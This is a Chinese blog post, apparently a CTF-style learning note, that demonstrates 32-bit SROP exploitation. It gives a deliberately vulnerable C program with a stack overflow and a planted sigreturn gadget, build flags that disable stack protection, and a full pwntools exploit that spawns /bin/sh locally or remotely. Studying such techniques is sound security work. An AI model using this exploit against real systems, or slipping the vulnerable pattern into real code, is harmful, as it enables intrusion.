SROP 32位DEMO

最新推荐文章于 2024-12-10 14:43:06 发布
最新推荐文章于 2024-12-10 14:43:06 发布
阅读量602 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: PWN 文章标签: SROP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/luozhaotian/article/details/79607887
本文介绍了一种名为Sigreturn Oriented Programming (SROP) 的攻击方式,并通过具体实例演示了如何利用该技术进行攻击。文中详细解释了遇到的问题及解决办法,如VDSO爆破失败和main函数栈溢出等问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >


概述

开始学习SROP技巧。希望找到一个简单的demo来了解SROP。找了很多资料,但都没有实作成功。

主要参考这篇文章

1. Sigreturn Oriented Programming攻击简介

https://www.anquanke.com/post/id/85810

直接拿原文中的程序测试,没有复现成功,主要的问题有:

1. VDSO的爆破不成功,GDB调试发现对应的位置没有找到对应的指令:

sigreturn syscall

int 80h

解决方法是直接在代码中加入这些gadget。

使用了这里的代码:

https://github.com/eQu1NoX/srop-poc/blob/master/poc-32.c

PS:问题在于测试的系统不一样,VDSO中syscall的偏移位置有变化

2. 漏洞代码移到了单独的函数

放到main中时,main执行到ret时会core,不知道为什么?

PS:失败的原因在于main函数的栈溢出不好搞。Main开始对ESP进行了取整,EBP-4的地方存储的是addr_of_argc。Main的结尾,ESP是通过EBP-4处保存的addr_of_argc进行恢复的。这样main函数栈溢出不成功的原因就很清楚了,EBP-4(addr_of_argc)被覆盖成了一个非法的地址,lea     esp, [ecx-4]这条指令会挂;而且真正的返回地址也没有设置好(不在EBP+4)。

程序

#include <stdio.h>

#include <unistd.h>

 

char buf[10] = "/bin/sh\x00";

 

void ret_15(void) {

asm(".intel_syntax noprefix\n");

asm("mov eax, 0x77\n");

asm("int 0x80\n");

asm("ret\n");

}

 

int vul()

{

char s[0x100];

puts("input something you want: ");

read(0, s, 0x400);

return 0;

}

 

int main()

{

vul();

return 0;

}

 makefile

build:

    gcc -o srop_test srop_test.c -fno-stack-protector -masm=intel -m32

 

EXP

from pwn import *

import random

 

#context(os='linux', arch='i386', log_level='debug')

context(os='linux', arch='i386')

 

program_name = './srop_test'

binsh_addr = 0x804a020

bss_addr = 0x804a02a

ret_sigreturn_addr = 0x0804843e #address of ret_sigreturn

syscall_addr = 0x08048443   #address of int 80h

 

def exploit(p):

payload = 'a' * 0x10c

frame = SigreturnFrame(kernel = "i386")

frame.eax = 0xb

frame.ebx = binsh_addr

frame.ecx = 0

frame.edx = 0

frame.eip = syscall_addr #address of int 80h

frame.esp = bss_addr

frame.ebp = bss_addr

frame.gs = 0x63

frame.cs = 0x23

frame.es = 0x2b

frame.ds = 0x2b

frame.ss = 0x2b

ret_addr = ret_sigreturn_addr #address of sigreturn syscall

#print payload

payload += p32(ret_addr) + str(frame)

p.recvuntil("input something you want: ")

p.sendline(payload)

sleep(1)

p.sendline("echo pwned!")

r = p.recvuntil("pwned!")

if r.endswith("pwned!") == False :

raise Exception("Failed!")

return

if __name__ == "__main__":

if len(sys.argv) > 1:

p = remote(sys.argv[1], int(sys.argv[2]))

else:

p = process(program_name)

pause()

exploit(p)

p.interactive()

 测试环境

Ubuntu 16.04 64

运行

 

参考文章

1. Sigreturn Oriented Programming攻击简介。

https://www.anquanke.com/post/id/85810

SROP 32--Fun with SROP Exploitation
MillionSky的专栏
03-19 487
1 概述本文是这篇文章的笔记:Fun with SROP Exploitationhttps://v0ids3curity.blogspot.jp/2015/06/fun-with-srop-exploitation.html 环境:Ubuntu 16.042 程序nasm -felf32 vuln_s.asmld vuln_s.o -melf_i386 -o vuln_s millionsky@...
SROP
o琦野o的博客
02-03 931
SROPSignal机制Signal机制漏洞Signal机制利用SROP成立的条件常用系统调用调用号6432 Signal机制 SROP 的全称是 Sigreturn Oriented Programming 。sigreturn是一个系统调用。  ​ ​当内核向某个进程发起一个 signal ,该进程会被暂时挂起,进入内核。内核会帮用户进程将其上下文保存在该进程的栈上,然后在栈顶填上一个地址 rt_sigreturn ,这个地址指向一段代码,在这段代码中会调用sigreturn系统调用
Mplus Demo 32
03-24
适合windiws32操作系统,适合非正态性分布数据,安装java环境后适合结构方程应用
SROP 32VDSO的爆破
MillionSky的专栏
03-19 703
1 概述https://www.anquanke.com/post/id/85810Sigreturn Oriented Programming攻击简介这篇文章描述了32vdso的爆破本文是对它的复现和笔记。2 32VDSO的爆破2.1 原理32的VDSO只有1个字节是随机的vdso_range = range(0xf7700000, 0xf7800000, 0x1000)2.2 程序#in...
CentOS x86_64上编译32demo程序
auvKone
07-16 4935
1.写个hello world的简单程序 gcc -m32 a.c rpm -import http://mirrors.163.com/centos/RPM-GPG-KEY-CentOS-7
SROP 64-smallest(2017429ctf.ichunqiu)
MillionSky的专栏
03-19 1350
1 概述360春秋杯”国际网络安全挑战赛Challenge - smallest (pwn 300) - 429 ichunqiu ctf 2017http://2017429ctf.ichunqiu.com/competition/index 64SROP很好的练习题。2 程序分析millionsky@ubuntu-16:~/tmp/smallest$ objdump -d smallest ...
SROP 学习笔记
Assassin
05-14 1096
文章目录一、基本介绍二、signal 机制三、攻击原理四、SROP chain的构造五、关于利用六、例题讲解 本文只是学习的记录文章,主要是以CTF wiki为主,然后加上例题讲解。 一、基本介绍 SROP(Sigreturn Oriented Programming) 于 2014 年被 Vrije Universiteit Amsterdam 的 Erik Bosman 提出,其相关研究Framing Signals — A Return to Portable Shellcode发表在安全顶级会议
MSE.zip_MSE-SROP_carrier_carrier mse_matlab mse_ofdm
09-24
标题"MSE.zip_MSE-SROP_carrier_carrier mse_matlab mse_ofdm"涉及到的主要知识点是关于无线通信中的误差性能评估,特别是针对正交频分复用(OFDM)系统。描述提到的是一个基于平均平方误差(Mean Square Error,MSE...
SROP ctfshow
最新发布
01-16
### SROP 技术详解 SROP (Sigreturn Oriented Programming) 是一种高级攻击技术,主要针对启用了 NX(No-eXecute)保护的系统。这种技术利用了类 Unix 系统中的 Signal 机制来绕过某些安全防护措施[^2]。 #### ...
SROP(Sigreturn Oriented Programming)
菊花的老窝
05-04 1174
如图所示,当有中断或异常产生时,内核会向某个进程发送一个 signal,该进程被挂起并进入内核(1),然后内核为该进程保存相应的上下文,然后跳转到之前注册好的 signal handler 中处理相应的 signal(2),当 signal handler 返回后(3),内核为该进程恢复之前保存的上下文,最终恢复进程的执行(4)。会从用户栈上恢复恢复所有寄存器的值,而用户栈是保存在用户进程的地址空间中的,是用户进程可读写的。和其他的系统调用串起来,形成一个链,从而达到任意代码执行的目的。
ROP SROP BROP
qq_69100706的博客
08-19 481
在CTF(Capture The Flag)竞赛中,"leaking"(泄露)信息指的是利用软件中的漏洞来揭示程序的内部状态或敏感数据,这些信息可以被用来进一步攻击程序或绕过安全防护。在具体的上下文中,"leak PIE"和"leak canary"是指通过漏洞获取程序的基地址(PIE泄露)或Canary值(Canary泄露),这两者都是现代程序安全防护的一部分。
PWN——SROP(高级ROP)
Pr0b1em的博客
12-10 455
Srop 的全称是Sigreturn Oriented ProgrammingSrop 可以理解成一种高级的ROP,利用了linux下15号系统调用的->rt_sigreturn。
linux内核pwn,Linux pwn入门教程(8)——SROP
weixin_28909779的博客
04-29 872
作者:Tangerine@SAINTSEC0x00 SROP应用场景与原理SROP是一个于2014年被发表在信安顶会Okaland 2014上的文章提出的一种攻击方式,相信很多读者对这个方式的了解都源于freebuf上的这篇文章'http://www.freebuf.com/articles/network/87447.html'。正如这篇文章所说,传统的ROP技术,尤其是amd64上的ROP,需...
SROP简单介绍和例题
qq_45595732的博客
03-02 4310
SROP本质是 sigreturn 这个系统调用,主要是将所有寄存器压入栈中,以及压入 signal 信息,以及指向 sigreturn 的系统调用地址。 对于 signal Frame 来说,会因为架构的不同而有所区别,这里给出分别给出 x86 以及 x64 的 sigcontext 。 x86 struct sigcontext { unsigned short gs, __gsh; unsigned short fs, __fsh; unsigned short es, __esh;
关于对SROP详解
stopys6的博客
09-08 847
在打NepCTF2023的时候,pwn的第一题就是srop,但是我发现我好像没学hhh,当时比赛的时候恶补了一下,赛后整理一下写一篇文章吧。SROP全称为(Sigreturn Oriented Programming),在ctfwiki中将其归类为了高级ROP,其中,sigreturn是一个系统调用,在类 unix 系统发生 signal 的时候会被间接地调用,其实就是利用了linux中的系统调用号,利用linux下的15号系统调用号调用->rt_sigreturn。
萌新学pwn之SROP
qq_36495104的博客
05-22 1004
这篇文章主要是讲解对ctf-wiki上面的SROP例子的理解,题目是360ctf的一个题目 代码很简单 .text:00000000004000B0 public start .text:00000000004000B0 start proc near ; DATA XREF: LOAD:0000000000400018↑o .text:00000000004000B0 xor rax,
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值